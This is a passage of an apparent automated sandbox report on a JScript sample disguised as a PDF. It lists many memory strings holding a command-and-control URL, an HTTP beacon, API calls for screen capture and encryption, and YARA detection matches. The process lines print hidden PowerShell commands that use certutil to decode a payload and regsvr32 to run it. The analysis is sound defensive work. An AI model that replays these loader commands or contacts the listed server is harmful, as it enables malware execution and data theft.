Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11907
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11909
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190;
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190=N
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190=t
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190?
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190?L
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190A(
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190AC
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190AL:
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190B
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190C
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190D
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190EC
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Et
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190F
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190FN
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190G
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190G~
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190H
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190HN
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190It
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190I~
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190J
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K/M
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K0
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K7
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Kz
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190LM
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190MC
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Mt
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190N
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O$
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O-
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190P
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190PO
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Q
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190QN
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190R
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190S
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190SL
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190T
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190UM
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190V
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190W
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Y
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190YC
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190_M
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190b
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190b(
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bCM
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bJ(
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bK
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bK:M
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bKy(
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bO
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bc
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bm~5
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bn(#
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bt75
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190c
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190csi
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190db
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190db;M
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190d~
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190e
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190f
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190f-1
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190fb
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190g
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190gM
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190h
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190iC&
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190iM
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190l
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190lN/
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190lO)
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190m
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190mC
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190n
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190o
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p(1
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190pLk
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190q
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190qB
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190r
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190s
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190t
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190u
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uB
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uC
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uN&
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190v
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190v~
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190wP
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190x
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190xt
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190y
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190yC6
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190z
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190~N

Source: unknown

HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: texts.letterpaper.press

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DA7940 InternetOpenW,InternetConnectW,HttpOpenRequestW,HttpSendRequestW,HttpQueryInfoW,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

13_2_00007FF983DA7940

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983D99FE0 GetDesktopWindow,GetDC,CreateCompatibleDC,LoadLibraryA,GetProcAddress,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,BitBlt,GetObjectW,GetDIBits,WriteFile,CloseHandle,SelectObject,DeleteObject,DeleteDC,ReleaseDC,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

13_2_00007FF983D99FE0

Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D989D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	13_2_00007FF983D989D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DE3028 CryptImportKey,SetEndOfFile,RtlSizeHeap,GetProcessHeap,SetEnvironmentVariableW,	13_2_00007FF983DE3028
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D98D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,	13_2_00007FF983D98D10
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D089D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	19_2_00007FF983D089D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D53028 CryptImportKey,	19_2_00007FF983D53028
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D08D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,	19_2_00007FF983D08D10

System Summary:

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior

Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse, type: SAMPLE	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.544459351.0000027E99732000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.534562796.0000027E99708000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000004.00000002.454006767.0000022E214AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000004.00000002.453909044.0000022E2144F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.534889418.0000027E99708000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.546366739.0000027E9B3E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000004.00000002.445327272.0000022E1F060000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.562500921.0000027E9993A000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.559995374.0000027E99740000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.399402263.0000027E9B3C3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
